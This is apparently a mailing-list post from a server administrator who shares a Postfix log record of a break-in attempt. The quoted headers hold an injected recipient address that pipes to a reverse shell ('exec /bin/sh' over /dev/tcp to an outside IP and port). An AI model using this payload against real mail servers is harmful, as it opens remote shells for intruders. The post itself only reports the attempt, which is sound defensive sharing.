Hello Folks,
With all the talk about SSH security, it is also shocking to see the
break-in attempts made on other services e.g. httpd and smtpd.
The httpd are often mod_proxy or PHP/phpMyAdmin attempts (no PHP
here), but an odd record in the Postfix log today was a little
different :
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"@calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue@???
To: undisclosed-recipients:;
I assume some sort of attempt to break Postfix. This message was
delivered to "root" mailbox (no content).
Scary place the internet sometimes ....
Cheers,
--
Alastair Sherringham
